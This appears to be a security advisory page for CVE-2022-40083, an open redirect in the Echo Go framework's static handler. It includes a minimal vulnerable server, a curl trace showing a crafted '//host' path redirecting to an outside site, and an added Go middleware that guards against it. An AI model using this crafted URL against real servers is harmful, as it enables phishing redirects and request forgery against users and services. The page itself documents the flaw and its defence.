Headline
CVE-2022-40083: vulnerability: open redirect in static handler · Issue #2259 · labstack/echo
Labstack Echo v4.8.0 was discovered to contain an open redirect vulnerability via the Static Handler component. This vulnerability can be leveraged by attackers to cause a Server-Side Request Forgery (SSRF).
Issue Description
301 redirect, and may further cause SSRF
see:
go-macaron/macaron#198
also see:
Django CVE-2018-14574
package main

import (
	"github.com/labstack/echo/v4"
)

func main() {
	e := echo.New()
	e.Static("/", "./")
	e.Logger.Fatal(e.Start(":1323"))
}
D:\> curl -Lv http://127.0.0.1:1323//ruokeqx.gitee.io%2f…
*   Trying 127.0.0.1:1323…
* Connected to 127.0.0.1 (127.0.0.1) port 1323 (#0)
> GET //ruokeqx.gitee.io%2f… HTTP/1.1
> Host: 127.0.0.1:1323
> User-Agent: curl/7.83.1
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
< Location: //ruokeqx.gitee.io/…/
< Date: Sun, 04 Sep 2022 18:47:04 GMT
< Content-Length: 0
<
* Connection #0 to host 127.0.0.1 left intact
* Clear auth, redirects to port from 1323 to 80
* Issue another request to this URL: 'http://ruokeqx.gitee.io/'
*   Trying 212.64.63.190:80…
* Connected to ruokeqx.gitee.io (212.64.63.190) port 80 (#1)
> GET / HTTP/1.1
> Host: ruokeqx.gitee.io
> User-Agent: curl/7.83.1
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 04 Sep 2022 18:47:03 GMT
< Content-Type: text/html
< Content-Length: 182
< Connection: keep-alive
< Server: openresty
< Location: https://ruokeqx.gitee.io/
< Expires: Mon, 05 Sep 2022 18:47:03 GMT
< Cache-Control: max-age=86400
<
* Ignoring the response-body
* Connection #1 to host ruokeqx.gitee.io left intact
* Clear auth, redirects to port from 80 to 443
* Issue another request to this URL: 'https://ruokeqx.gitee.io/'
*   Trying 212.64.63.190:443…
* Connected to ruokeqx.gitee.io (212.64.63.190) port 443 (#2)
* schannel: disabled automatic use of client certificate
* ALPN: offers http/1.1
* ALPN: server accepted http/1.1
> GET / HTTP/1.1
> Host: ruokeqx.gitee.io
> User-Agent: curl/7.83.1
> Accept: */*
>
* schannel: failed to decrypt data, need more data
* schannel: failed to decrypt data, need more data
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sun, 04 Sep 2022 18:47:04 GMT
< Content-Type: text/html
< Content-Length: 94632
< Connection: keep-alive
< Server: openresty
< Last-Modified: Sun, 04 Sep 2022 17:49:25 GMT
< ETag: "6314e525-171a8"
< Expires: Mon, 05 Sep 2022 18:47:04 GMT
< Cache-Control: max-age=86400
< Accept-Ranges: bytes
<
<!DOCTYPE html> …
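The mechanism visible in the trace above is a static handler that answers a directory request with a 301 to the request path plus a trailing slash; when that path begins with `//`, the Location header becomes a scheme-relative URL that the client resolves against a foreign host, which is why curl follows it to ruokeqx.gitee.io. The following Go program is an added example, not echo's code and not its 4.9.0 fix: a minimal directory-redirect handler that models that behaviour with the standard library only, a middleware that collapses leading slashes (and the backslash variant browsers fold into a slash) before any redirect is computed, and a check that flags scheme-relative Location values for use in tests or when reviewing access logs. The hostname evil.example, the handler names and the helper names are constructed for this example.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// isProtocolRelative reports whether a redirect target would be resolved by a
// browser as a scheme-relative URL (//host/... or /\host/...), i.e. a redirect
// to another origin even though it carries no scheme. Hypothetical helper.
func isProtocolRelative(location string) bool {
	return strings.HasPrefix(location, "//") || strings.HasPrefix(location, "/\\")
}

// normalizePath collapses any run of leading slashes or backslashes to a
// single "/", so "//evil.example/x" is treated as the local path "/evil.example/x".
func normalizePath(p string) string {
	return "/" + strings.TrimLeft(p, "/\\")
}

// singleLeadingSlash is a middleware (constructed for this example) that
// rewrites the request path before any handler that may redirect on it.
func singleLeadingSlash(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if isProtocolRelative(r.URL.Path) {
			r.URL.Path = normalizePath(r.URL.Path)
			r.URL.RawPath = "" // keep EscapedPath consistent with the rewritten Path
		}
		next.ServeHTTP(w, r)
	})
}

// trailingSlashRedirect models what a directory-serving static handler commonly
// does: a request without a trailing slash gets a 301 to the same path plus "/".
// This is a simplified model, not echo's implementation.
func trailingSlashRedirect(w http.ResponseWriter, r *http.Request) {
	p := r.URL.Path
	if !strings.HasSuffix(p, "/") {
		http.Redirect(w, r, p+"/", http.StatusMovedPermanently)
		return
	}
	fmt.Fprintf(w, "directory listing for %s\n", p)
}

// unguarded is the redirecting handler on its own; guarded wraps it in the
// normalizing middleware.
var (
	unguarded http.Handler = http.HandlerFunc(trailingSlashRedirect)
	guarded   http.Handler = singleLeadingSlash(unguarded)
)

// locationFor sends an in-memory GET for target to h and returns the Location
// header the handler produced ("" if it did not redirect).
func locationFor(h http.Handler, target string) string {
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, httptest.NewRequest(http.MethodGet, target, nil))
	return rec.Header().Get("Location")
}

func main() {
	for _, target := range []string{"/docs", "//evil.example/docs"} {
		u, g := locationFor(unguarded, target), locationFor(guarded, target)
		fmt.Printf("%-22s unguarded -> %q (off-site: %v)  guarded -> %q (off-site: %v)\n",
			target, u, isProtocolRelative(u), g, isProtocolRelative(g))
	}
}
```

Running it shows the unguarded handler answering `//evil.example/docs` with `Location: //evil.example/docs/`, exactly the shape seen in the curl trace, while the guarded handler answers with `/evil.example/docs/`, a path on the same origin; ordinary requests such as `/docs` are redirected unchanged. The normalization has to run before the redirect is computed, because the client, not the server, decides how a `//` Location is interpreted.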
Related news
Labstack Echo v4.8.0 was discovered to contain an open redirect vulnerability via the Static Handler component. This vulnerability can be leveraged by attackers to cause a Server-Side Request Forgery (SSRF). Version 4.9.0 contains a patch for the issue.
macaron before 1.3.7 has an open redirect in the static handler, as demonstrated by the http://127.0.0.1:4000//example.com/ URL.